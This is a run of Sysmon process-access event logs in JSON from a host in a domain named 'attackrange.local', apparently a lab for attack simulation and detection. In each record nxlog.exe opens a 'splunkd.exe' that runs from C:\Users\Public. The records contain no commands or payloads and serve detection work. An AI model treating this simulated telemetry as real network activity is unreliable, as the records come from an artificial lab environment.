(x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4613,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:11.508\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:11.508","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4614,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:12.509\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:12.509","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4615,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:13.509\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:13.509","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4616,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:14.509\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:14.509","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4617,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:15.510\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:15.510","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4618,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:16.510\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:16.510","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
